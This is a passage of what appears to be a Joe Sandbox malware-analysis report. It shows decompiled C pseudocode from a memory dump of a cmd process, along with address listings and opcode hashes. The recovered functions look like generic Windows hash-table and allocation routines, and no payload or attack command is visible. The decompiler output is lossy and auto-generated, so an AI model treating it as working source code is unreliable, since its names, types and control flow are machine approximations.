								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E03C2D130(_t427, _t494, _t511);
				}
			}










































































                                                                                                                                          0x03ca5ba5
                                                                                                                                          0x03ca5baa
                                                                                                                                          0x03ca5baf
                                                                                                                                          0x03ca5bb4
                                                                                                                                          0x03ca5bb6
                                                                                                                                          0x03ca5bbc
                                                                                                                                          0x03ca5bbe
                                                                                                                                          0x03ca5bc4
                                                                                                                                          0x03ca5bcd
                                                                                                                                          0x03ca5bd3
                                                                                                                                          0x03ca5bd6
                                                                                                                                          0x03ca5bdc
                                                                                                                                          0x03ca5be0
                                                                                                                                          0x03ca5be3
                                                                                                                                          0x03ca5beb
                                                                                                                                          0x03ca5bf2
                                                                                                                                          0x03ca5bf8
                                                                                                                                          0x03ca5bfe
                                                                                                                                          0x03ca5c04
                                                                                                                                          0x03ca5c0e
                                                                                                                                          0x03ca5c18
                                                                                                                                          0x03ca5c1f
                                                                                                                                          0x03ca5c25
                                                                                                                                          0x03ca5c2a
                                                                                                                                          0x03ca5c2c
                                                                                                                                          0x03ca5c32
                                                                                                                                          0x03ca5c3a
                                                                                                                                          0x03ca5c3f
                                                                                                                                          0x03ca5c42
                                                                                                                                          0x03ca5c48
                                                                                                                                          0x03ca5c5b
                                                                                                                                          0x03ca5c5b
                                                                                                                                          0x03ca5c2c
                                                                                                                                          0x03ca5cb7
                                                                                                                                          0x03ca5cb9
                                                                                                                                          0x03ca5cbf
                                                                                                                                          0x03ca5cc2
                                                                                                                                          0x03ca5cca
                                                                                                                                          0x03ca5ccb
                                                                                                                                          0x03ca5ccb
                                                                                                                                          0x03ca5cd1
                                                                                                                                          0x03ca5cd7
                                                                                                                                          0x03ca5cda
                                                                                                                                          0x03ca5ce1
                                                                                                                                          0x03ca5ce4
                                                                                                                                          0x03ca5ce7
                                                                                                                                          0x03ca5ced
                                                                                                                                          0x03ca5cf3
                                                                                                                                          0x03ca5cf9
                                                                                                                                          0x03ca5cff
                                                                                                                                          0x03ca5d08
                                                                                                                                          0x03ca5d0a
                                                                                                                                          0x03ca5d0e
                                                                                                                                          0x03ca5d10
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca5d16
                                                                                                                                          0x03ca5d1a
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca5d20
                                                                                                                                          0x03ca5d22
                                                                                                                                          0x03ca5d25
                                                                                                                                          0x03ca5d2f
                                                                                                                                          0x03ca5d2f
                                                                                                                                          0x03ca5d33
                                                                                                                                          0x03ca5d3d
                                                                                                                                          0x03ca5d49
                                                                                                                                          0x03ca5d4b
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca5d5a
                                                                                                                                          0x03ca5d5d
                                                                                                                                          0x03ca5d60
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca5d66
                                                                                                                                          0x03ca5d69
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca5d6f
                                                                                                                                          0x03ca5d6f
                                                                                                                                          0x03ca5d73
                                                                                                                                          0x03ca5d79
                                                                                                                                          0x03ca5d7f
                                                                                                                                          0x03ca5d86
                                                                                                                                          0x03ca5d95
                                                                                                                                          0x03ca5d98
                                                                                                                                          0x03ca5dba
                                                                                                                                          0x03ca5dcb
                                                                                                                                          0x03ca5dce
                                                                                                                                          0x03ca5dd3
                                                                                                                                          0x03ca5dd6
                                                                                                                                          0x03ca5dd8
                                                                                                                                          0x03ca5de6
                                                                                                                                          0x03ca5dec
                                                                                                                                          0x03ca5dee
                                                                                                                                          0x03ca5df1
                                                                                                                                          0x03ca5df3
                                                                                                                                          0x03ca635a
                                                                                                                                          0x03ca635a
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca635a
                                                                                                                                          0x03ca5dfe
                                                                                                                                          0x03ca5e02
                                                                                                                                          0x03ca5e05
                                                                                                                                          0x03ca5e07
                                                                                                                                          0x03ca5e10
                                                                                                                                          0x03ca5e13
                                                                                                                                          0x03ca5e1b
                                                                                                                                          0x03ca5e1c
                                                                                                                                          0x03ca5e21
                                                                                                                                          0x03ca5e22
                                                                                                                                          0x03ca5e23
                                                                                                                                          0x03ca5e25
                                                                                                                                          0x03ca5e2a
                                                                                                                                          0x03ca5e2c
                                                                                                                                          0x03ca5e2e
                                                                                                                                          0x03ca5e36
                                                                                                                                          0x03ca5e39
                                                                                                                                          0x03ca5e42
                                                                                                                                          0x03ca5e47
                                                                                                                                          0x03ca5e4d
                                                                                                                                          0x03ca5e54
                                                                                                                                          0x03ca5e54
                                                                                                                                          0x03ca5e54
                                                                                                                                          0x03ca5e2e
                                                                                                                                          0x03ca5e5c
                                                                                                                                          0x03ca5e5f
                                                                                                                                          0x03ca5e62
                                                                                                                                          0x03ca5e64
                                                                                                                                          0x03ca5e6b
                                                                                                                                          0x03ca5e70
                                                                                                                                          0x03ca5e7a
                                                                                                                                          0x03ca5e7a
                                                                                                                                          0x03ca5e7a
                                                                                                                                          0x03ca5e6b
                                                                                                                                          0x03ca5e7e
                                                                                                                                          0x03ca5e7f
                                                                                                                                          0x03ca5e7f
                                                                                                                                          0x03ca5e81
                                                                                                                                          0x03ca5e87
                                                                                                                                          0x03ca5e8b
                                                                                                                                          0x03ca5e8c
                                                                                                                                          0x03ca5e8c
                                                                                                                                          0x03ca5e8c
                                                                                                                                          0x03ca5e9a
                                                                                                                                          0x03ca5e9c
                                                                                                                                          0x03ca5ea2
                                                                                                                                          0x03ca5ea6
                                                                                                                                          0x03ca5f50
                                                                                                                                          0x03ca5f50
                                                                                                                                          0x03ca5f57
                                                                                                                                          0x03ca5f66
                                                                                                                                          0x03ca5f66
                                                                                                                                          0x03ca5f66
                                                                                                                                          0x03ca5f68
                                                                                                                                          0x03ca5f6a
                                                                                                                                          0x03ca63d0
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca5f70
                                                                                                                                          0x03ca5f70
                                                                                                                                          0x03ca5f91
                                                                                                                                          0x03ca5f9c
                                                                                                                                          0x03ca5f9e
                                                                                                                                          0x03ca5fa4
                                                                                                                                          0x03ca5fa6
                                                                                                                                          0x03ca638c
                                                                                                                                          0x03ca6392
                                                                                                                                          0x03ca63a1
                                                                                                                                          0x03ca63a7
                                                                                                                                          0x03ca63af
                                                                                                                                          0x03ca63af
                                                                                                                                          0x03ca63bd
                                                                                                                                          0x03ca63d8
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca63d8
                                                                                                                                          0x03ca5fac
                                                                                                                                          0x03ca5fb2
                                                                                                                                          0x03ca5fb4
                                                                                                                                          0x03ca5fbd
                                                                                                                                          0x03ca5fc6
                                                                                                                                          0x03ca5fce
                                                                                                                                          0x03ca5fd4
                                                                                                                                          0x03ca5fdc
                                                                                                                                          0x03ca5fec
                                                                                                                                          0x03ca5fed
                                                                                                                                          0x03ca5fee
                                                                                                                                          0x03ca5fef
                                                                                                                                          0x03ca5ff9
                                                                                                                                          0x03ca5ffa
                                                                                                                                          0x03ca5ffb
                                                                                                                                          0x03ca5ffc
                                                                                                                                          0x03ca6000
                                                                                                                                          0x03ca6004
                                                                                                                                          0x03ca6012
                                                                                                                                          0x03ca6012
                                                                                                                                          0x03ca6018
                                                                                                                                          0x03ca6019
                                                                                                                                          0x03ca601a
                                                                                                                                          0x03ca601b
                                                                                                                                          0x03ca601c
                                                                                                                                          0x03ca6020
                                                                                                                                          0x03ca6059
                                                                                                                                          0x03ca605c
                                                                                                                                          0x03ca6061
                                                                                                                                          0x03ca6061
                                                                                                                                          0x03ca6022
                                                                                                                                          0x03ca6022
                                                                                                                                          0x03ca6022
                                                                                                                                          0x03ca6025
                                                                                                                                          0x03ca602a
                                                                                                                                          0x03ca602b
                                                                                                                                          0x03ca6031
                                                                                                                                          0x03ca6037
                                                                                                                                          0x03ca6038
                                                                                                                                          0x03ca603e
                                                                                                                                          0x03ca6048
                                                                                                                                          0x03ca6049
                                                                                                                                          0x03ca604a
                                                                                                                                          0x03ca604b
                                                                                                                                          0x03ca604c
                                                                                                                                          0x03ca604d
                                                                                                                                          0x03ca6053
                                                                                                                                          0x03ca6054
                                                                                                                                          0x03ca6054
                                                                                                                                          0x03ca6062
                                                                                                                                          0x03ca6065
                                                                                                                                          0x03ca6067
                                                                                                                                          0x03ca606a
                                                                                                                                          0x03ca6070
                                                                                                                                          0x03ca6075
                                                                                                                                          0x03ca6076
                                                                                                                                          0x03ca6081
                                                                                                                                          0x03ca6087
                                                                                                                                          0x03ca6095
                                                                                                                                          0x03ca6099
                                                                                                                                          0x03ca609e
                                                                                                                                          0x03ca60a4
                                                                                                                                          0x03ca60ae
                                                                                                                                          0x03ca60b0
                                                                                                                                          0x03ca60b3
                                                                                                                                          0x03ca60b6
                                                                                                                                          0x03ca60b8
                                                                                                                                          0x03ca60ba
                                                                                                                                          0x03ca60ba
                                                                                                                                          0x03ca60ba
                                                                                                                                          0x03ca60ba
                                                                                                                                          0x03ca60be
                                                                                                                                          0x03ca60c0
                                                                                                                                          0x03ca60c5
                                                                                                                                          0x03ca60c5
                                                                                                                                          0x03ca60c5
                                                                                                                                          0x03ca60c6
                                                                                                                                          0x03ca60cd
                                                                                                                                          0x03ca6114
                                                                                                                                          0x03ca60cf
                                                                                                                                          0x03ca60cf
                                                                                                                                          0x03ca60d4
                                                                                                                                          0x03ca60d5
                                                                                                                                          0x03ca60da
                                                                                                                                          0x03ca60db
                                                                                                                                          0x03ca60e1
                                                                                                                                          0x03ca60e2
                                                                                                                                          0x03ca60e8
                                                                                                                                          0x03ca60f8
                                                                                                                                          0x03ca60fd
                                                                                                                                          0x03ca60fe
                                                                                                                                          0x03ca6102
                                                                                                                                          0x03ca6104
                                                                                                                                          0x03ca6107
                                                                                                                                          0x03ca6109
                                                                                                                                          0x03ca610b
                                                                                                                                          0x03ca610b
                                                                                                                                          0x03ca610b
                                                                                                                                          0x03ca610b
                                                                                                                                          0x03ca610f
                                                                                                                                          0x03ca610f
                                                                                                                                          0x03ca6117
                                                                                                                                          0x03ca611a
                                                                                                                                          0x03ca611f
                                                                                                                                          0x03ca6125
                                                                                                                                          0x03ca6134
                                                                                                                                          0x03ca6139
                                                                                                                                          0x03ca613f
                                                                                                                                          0x03ca6146
                                                                                                                                          0x03ca6148
                                                                                                                                          0x03ca614b
                                                                                                                                          0x03ca614d
                                                                                                                                          0x03ca614f
                                                                                                                                          0x03ca614f
                                                                                                                                          0x03ca614f
                                                                                                                                          0x03ca614f
                                                                                                                                          0x03ca6153
                                                                                                                                          0x03ca6159
                                                                                                                                          0x03ca6159
                                                                                                                                          0x03ca615c
                                                                                                                                          0x03ca6163
                                                                                                                                          0x03ca6169
                                                                                                                                          0x03ca616c
                                                                                                                                          0x03ca6172
                                                                                                                                          0x03ca6181
                                                                                                                                          0x03ca6186
                                                                                                                                          0x03ca6187
                                                                                                                                          0x03ca618b
                                                                                                                                          0x03ca6191
                                                                                                                                          0x03ca6195
                                                                                                                                          0x03ca61a3
                                                                                                                                          0x03ca61bb
                                                                                                                                          0x03ca61c0
                                                                                                                                          0x03ca61c3
                                                                                                                                          0x03ca61cc
                                                                                                                                          0x03ca61d0
                                                                                                                                          0x03ca61dc
                                                                                                                                          0x03ca61de
                                                                                                                                          0x03ca61e1
                                                                                                                                          0x03ca61e4
                                                                                                                                          0x03ca61e6
                                                                                                                                          0x03ca61e8
                                                                                                                                          0x03ca61e8
                                                                                                                                          0x03ca61e8
                                                                                                                                          0x03ca61e8
                                                                                                                                          0x03ca61e6
                                                                                                                                          0x03ca61ec
                                                                                                                                          0x03ca61f3
                                                                                                                                          0x03ca6203
                                                                                                                                          0x03ca6209
                                                                                                                                          0x03ca620a
                                                                                                                                          0x03ca6216
                                                                                                                                          0x03ca621d
                                                                                                                                          0x03ca6227
                                                                                                                                          0x03ca6241
                                                                                                                                          0x03ca6246
                                                                                                                                          0x03ca624c
                                                                                                                                          0x03ca6257
                                                                                                                                          0x03ca6259
                                                                                                                                          0x03ca625c
                                                                                                                                          0x03ca625e
                                                                                                                                          0x03ca6260
                                                                                                                                          0x03ca6260
                                                                                                                                          0x03ca6260
                                                                                                                                          0x03ca6260
                                                                                                                                          0x03ca625e
                                                                                                                                          0x03ca6264
                                                                                                                                          0x03ca6267
                                                                                                                                          0x03ca6269
                                                                                                                                          0x03ca6315
                                                                                                                                          0x03ca6315
                                                                                                                                          0x03ca631b
                                                                                                                                          0x03ca631e
                                                                                                                                          0x03ca6324
                                                                                                                                          0x03ca6327
                                                                                                                                          0x03ca632f
                                                                                                                                          0x03ca6330
                                                                                                                                          0x03ca6333
                                                                                                                                          0x03ca633a
                                                                                                                                          0x03ca633c
                                                                                                                                          0x03ca6335
                                                                                                                                          0x03ca6335
                                                                                                                                          0x03ca6335
                                                                                                                                          0x03ca633f
                                                                                                                                          0x03ca6342
                                                                                                                                          0x03ca634c
                                                                                                                                          0x03ca6352
                                                                                                                                          0x03ca6355
                                                                                                                                          0x03ca6355
                                                                                                                                          0x03ca6359
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca626f
                                                                                                                                          0x03ca6275
                                                                                                                                          0x03ca6275
                                                                                                                                          0x03ca6278
                                                                                                                                          0x03ca627e
                                                                                                                                          0x03ca627e
                                                                                                                                          0x03ca6281
                                                                                                                                          0x03ca6287
                                                                                                                                          0x03ca628d
                                                                                                                                          0x03ca6298
                                                                                                                                          0x03ca629c
                                                                                                                                          0x03ca62a2
                                                                                                                                          0x03ca629e
                                                                                                                                          0x03ca629e
                                                                                                                                          0x03ca629e
                                                                                                                                          0x03ca62a7
                                                                                                                                          0x03ca62a7
                                                                                                                                          0x03ca62aa
                                                                                                                                          0x03ca62b0
                                                                                                                                          0x03ca62f0
                                                                                                                                          0x03ca62f0
                                                                                                                                          0x03ca62f2
                                                                                                                                          0x03ca62f8
                                                                                                                                          0x03ca62fd
                                                                                                                                          0x03ca62b2
                                                                                                                                          0x03ca62b2
                                                                                                                                          0x03ca62b2
                                                                                                                                          0x03ca62b5
                                                                                                                                          0x03ca62dd
                                                                                                                                          0x03ca62e2
                                                                                                                                          0x03ca62e5
                                                                                                                                          0x03ca62b7
                                                                                                                                          0x03ca62b8
                                                                                                                                          0x03ca62bb
                                                                                                                                          0x03ca62bd
                                                                                                                                          0x03ca62c0
                                                                                                                                          0x03ca62c4
                                                                                                                                          0x03ca62cd
                                                                                                                                          0x03ca62cd
                                                                                                                                          0x03ca62c0
                                                                                                                                          0x03ca62bb
                                                                                                                                          0x03ca62b5
                                                                                                                                          0x03ca6302
                                                                                                                                          0x03ca6303
                                                                                                                                          0x03ca6305
                                                                                                                                          0x03ca6305
                                                                                                                                          0x03ca6305
                                                                                                                                          0x03ca630c
                                                                                                                                          0x03ca630c
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca627e
                                                                                                                                          0x03ca6269
                                                                                                                                          0x03ca5eac
                                                                                                                                          0x03ca5ebb
                                                                                                                                          0x03ca5ebe
                                                                                                                                          0x03ca5ecb
                                                                                                                                          0x03ca5ecb
                                                                                                                                          0x03ca5ece
                                                                                                                                          0x03ca5ece
                                                                                                                                          0x03ca5ed4
                                                                                                                                          0x03ca5ed7
                                                                                                                                          0x03ca5ed9
                                                                                                                                          0x03ca5edb
                                                                                                                                          0x03ca5edb
                                                                                                                                          0x03ca5ee1
                                                                                                                                          0x03ca5ee1
                                                                                                                                          0x03ca5ee3
                                                                                                                                          0x03ca5f20
                                                                                                                                          0x03ca5f20
                                                                                                                                          0x03ca5ee5
                                                                                                                                          0x03ca5ee5
                                                                                                                                          0x03ca5ee5
                                                                                                                                          0x03ca5ee8
                                                                                                                                          0x03ca5f11
                                                                                                                                          0x03ca5f18
                                                                                                                                          0x03ca5eea
                                                                                                                                          0x03ca5eea
                                                                                                                                          0x03ca5eed
                                                                                                                                          0x03ca5ef2
                                                                                                                                          0x03ca5ef8
                                                                                                                                          0x03ca5efb
                                                                                                                                          0x03ca5f0a
                                                                                                                                          0x03ca5f0a
                                                                                                                                          0x03ca5eed
                                                                                                                                          0x03ca5ee8
                                                                                                                                          0x03ca5f22
                                                                                                                                          0x03ca5f28
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca5f30
                                                                                                                                          0x03ca5f31
                                                                                                                                          0x03ca5f37
                                                                                                                                          0x03ca5f3a
                                                                                                                                          0x03ca5f3d
                                                                                                                                          0x03ca5f44
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca5f46
                                                                                                                                          0x03ca5f48
                                                                                                                                          0x03ca5f4d
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca5f4d
                                                                                                                                          0x03ca5dda
                                                                                                                                          0x03ca5ddf
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca5ddf
                                                                                                                                          0x03ca5dd8
                                                                                                                                          0x03ca5da7
                                                                                                                                          0x03ca5da9
                                                                                                                                          0x03ca5dac
                                                                                                                                          0x03ca5dae
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca5db4
                                                                                                                                          0x03ca5db4
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca5db4
                                                                                                                                          0x03ca5dae
                                                                                                                                          0x03ca5d88
                                                                                                                                          0x03ca5d8d
                                                                                                                                          0x03ca6363
                                                                                                                                          0x03ca6369
                                                                                                                                          0x03ca636a
                                                                                                                                          0x03ca6370
                                                                                                                                          0x03ca6372
                                                                                                                                          0x03ca637a
                                                                                                                                          0x03ca637b
                                                                                                                                          0x03ca637d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca637f
                                                                                                                                          0x03ca6385
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca6385
                                                                                                                                          0x03ca5d38
                                                                                                                                          0x03ca5d3b
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca5d3b
                                                                                                                                          0x03ca5d27
                                                                                                                                          0x03ca5d29
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca6360
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca6360
                                                                                                                                          0x03ca5c10
                                                                                                                                          0x03ca5c10
                                                                                                                                          0x03ca63da
                                                                                                                                          0x03ca63e5
                                                                                                                                          0x03ca63e5

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 47f02100ca24f3c297a4931d189cbc17ee49d14975a7844fef934a566a64e16f
                                                                                                                                          • Instruction ID: 833f374127ab017c1fed688d17b26ddbae428ea312cdf1bdebda48a58bb27c9d
                                                                                                                                          • Opcode Fuzzy Hash: 47f02100ca24f3c297a4931d189cbc17ee49d14975a7844fef934a566a64e16f
                                                                                                                                          • Instruction Fuzzy Hash: C5425B7590162ACFDB24CF68C880BA9F7B1FF45308F1981AAD94DEB242D7349A95CF50
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CAE824 Relevance: .5, Instructions: 493COMMONCrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                          			E03CAE824(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t179;
				unsigned int _t202;
				signed char _t207;
				signed char _t210;
				signed int _t230;
				void* _t244;
				unsigned int _t247;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed char _t293;
				signed char _t295;
				signed char _t298;
				intOrPtr* _t303;
				signed int _t310;
				signed char _t316;
				signed int _t319;
				signed char _t323;
				signed char _t330;
				signed int _t334;
				signed int _t337;
				signed int _t341;
				signed char _t345;
				signed char _t347;
				signed int _t353;
				signed char _t354;
				void* _t383;
				signed char _t385;
				signed char _t386;
				unsigned int _t392;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t401;
				unsigned int _t403;
				void* _t404;
				unsigned int _t405;
				signed int _t406;
				signed char _t412;
				unsigned int _t413;
				unsigned int _t418;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				signed char* _t425;
				signed int _t426;
				signed int _t428;
				unsigned int _t430;
				signed int _t431;
				signed int _t433;

				_v8 =  *0x3ccd360 ^ _t433;
				_v40 = __ecx;
				_v16 = __edx;
				_t289 = 0x4cb2f;
				_t425 = __edx[1];
				_t403 =  *__edx << 2;
				if(_t403 < 8) {
					L3:
					_t404 = _t403 - 1;
					if(_t404 == 0) {
						L16:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						L17:
						_t426 = _v40;
						_v20 = _t426 + 0x1c;
						_t177 = L03BFFAD0(_t426 + 0x1c);
						_t385 = 0;
						while(1) {
							L18:
							_t405 =  *(_t426 + 4);
							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
							_t316 = _t289 & _t179;
							_v24 = _t179;
							_v32 = _t316;
							_v12 = _t316 >> 0x18;
							_v36 = _t316 >> 0x10;
							_v28 = _t316 >> 8;
							if(_t385 != 0) {
								goto L21;
							}
							_t418 = _t405 >> 5;
							if(_t418 == 0) {
								_t406 = 0;
								L31:
								if(_t406 == 0) {
									L35:
									E03BFFA00(_t289, _t316, _t406, _t426 + 0x1c);
									 *0x3ccb1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
									_v36 = _t319;
									if(_t319 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t408 = _v16;
										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t319 + 0xb)) =  *_v16;
										 *(_t319 + 4) = _t289;
										_t53 = _t319 + 0xc; // 0xc
										E03BF2280(E03C1F3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
										_t428 = _v40;
										_t386 = 0;
										while(1) {
											L38:
											_t202 =  *(_t428 + 4);
											_v16 = _v16 | 0xffffffff;
											_v16 = _v16 << (_t202 & 0x0000001f);
											_t323 = _v16 & _t289;
											_v20 = _t323;
											_v20 = _v20 >> 0x18;
											_v28 = _t323;
											_v28 = _v28 >> 0x10;
											_v12 = _t323;
											_v12 = _v12 >> 8;
											_v32 = _t323;
											if(_t386 != 0) {
												goto L41;
											}
											_t247 = _t202 >> 5;
											_v24 = _t247;
											if(_t247 == 0) {
												_t412 = 0;
												L50:
												if(_t412 == 0) {
													L53:
													_t291 =  *(_t428 + 4);
													_v28 =  *((intOrPtr*)(_t428 + 0x28));
													_v44 =  *(_t428 + 0x24);
													_v32 =  *((intOrPtr*)(_t428 + 0x20));
													_t207 = _t291 >> 5;
													if( *_t428 < _t207 + _t207) {
														L74:
														_t430 = _t291 >> 5;
														_t293 = _v36;
														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
														_v44 = _t210;
														_t159 = _t430 - 1; // 0xffffffdf
														_t428 = _v40;
														_t330 =  *(_t428 + 8);
														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
														_t412 = _t293;
														 *_t293 =  *(_t330 + _t386 * 4);
														 *(_t330 + _t386 * 4) = _t293;
														 *_t428 =  *_t428 + 1;
														_t289 = 0;
														L75:
														E03BEFFB0(_t289, _t412, _t428 + 0x1c);
														if(_t289 != 0) {
															_t428 =  *(_t428 + 0x24);
															 *0x3ccb1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
															 *_t428();
														}
														L77:
														return E03C1B640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
													}
													_t334 = 2;
													_t207 = E03C0F3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
													if(_t207 < 0) {
														goto L74;
													}
													_t413 = _v24;
													if(_t413 < 4) {
														_t413 = 4;
													}
													 *0x3ccb1e0(_t413 << 2, _v28);
													_t207 =  *_v32();
													_t386 = _t207;
													_v16 = _t386;
													if(_t386 == 0) {
														_t291 =  *(_t428 + 4);
														if(_t291 >= 0x20) {
															goto L74;
														}
														_t289 = _v36;
														_t412 = 0;
														goto L75;
													} else {
														_t108 = _t413 - 1; // 0x3
														_t337 = _t108;
														if((_t413 & _t337) == 0) {
															L62:
															if(_t413 > 0x4000000) {
																_t413 = 0x4000000;
															}
															_t295 = _t386;
															_v24 = _v24 & 0x00000000;
															_t392 = _t413 << 2;
															_t230 = _t428 | 0x00000001;
															_t393 = _t392 >> 2;
															asm("sbb ecx, ecx");
															_t341 =  !(_v16 + _t392) & _t393;
															if(_t341 <= 0) {
																L67:
																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
																_v32 = _t395;
																_v20 = 0;
																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
																	L72:
																	_t345 =  *(_t428 + 8);
																	_t207 = _v16;
																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
																	 *(_t428 + 8) = _t207;
																	 *(_t428 + 4) = _t291;
																	if(_t345 != 0) {
																		 *0x3ccb1e0(_t345, _v28);
																		_t207 =  *_v44();
																		_t291 =  *(_t428 + 4);
																	}
																	goto L74;
																} else {
																	goto L68;
																}
																do {
																	L68:
																	_t298 =  *(_t428 + 8);
																	_t431 = _v20;
																	_v12 = _t298;
																	while(1) {
																		_t347 =  *(_t298 + _t431 * 4);
																		_v24 = _t347;
																		if((_t347 & 0x00000001) != 0) {
																			goto L71;
																		}
																		 *(_t298 + _t431 * 4) =  *_t347;
																		_t300 =  *(_t347 + 4) & _t395;
																		_t398 = _v16;
																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																		_t303 = _v24;
																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
																		_t395 = _v32;
																		_t298 = _v12;
																	}
																	L71:
																	_v20 = _t431 + 1;
																	_t428 = _v40;
																} while (_v20 <  *(_t428 + 4) >> 5);
																goto L72;
															} else {
																_t399 = _v24;
																do {
																	_t399 = _t399 + 1;
																	 *_t295 = _t230;
																	_t295 = _t295 + 4;
																} while (_t399 < _t341);
																goto L67;
															}
														}
														_t354 = _t337 | 0xffffffff;
														if(_t413 == 0) {
															L61:
															_t413 = 1 << _t354;
															goto L62;
														} else {
															goto L60;
														}
														do {
															L60:
															_t354 = _t354 + 1;
															_t413 = _t413 >> 1;
														} while (_t413 != 0);
														goto L61;
													}
												}
												_t89 = _t412 + 8; // 0x8
												_t244 = E03CAE7A8(_t89);
												_t289 = _v36;
												if(_t244 == 0) {
													_t412 = 0;
												}
												goto L75;
											}
											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
											_t323 = _v32;
											while(1) {
												L41:
												_t386 =  *_t386;
												_v12 = _t386;
												if((_t386 & 0x00000001) != 0) {
													break;
												}
												if(_t323 == ( *(_t386 + 4) & _v16)) {
													L45:
													if(_t386 == 0) {
														goto L53;
													}
													if(E03CAE7EB(_t386, _t408) != 0) {
														_t412 = _v12;
														goto L50;
													}
													_t386 = _v12;
													goto L38;
												}
											}
											_t386 = 0;
											_v12 = 0;
											goto L45;
										}
									}
									_t412 = 0;
									goto L77;
								}
								_t38 = _t406 + 8; // 0x8
								_t364 = _t38;
								if(E03CAE7A8(_t38) == 0) {
									_t406 = 0;
								}
								E03BFFA00(_t289, _t364, _t406, _v20);
								goto L77;
							}
							_t24 = _t418 - 1; // -1
							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
							_t316 = _v32;
							L21:
							_t406 = _v24;
							while(1) {
								_t385 =  *_t385;
								_v12 = _t385;
								if((_t385 & 0x00000001) != 0) {
									break;
								}
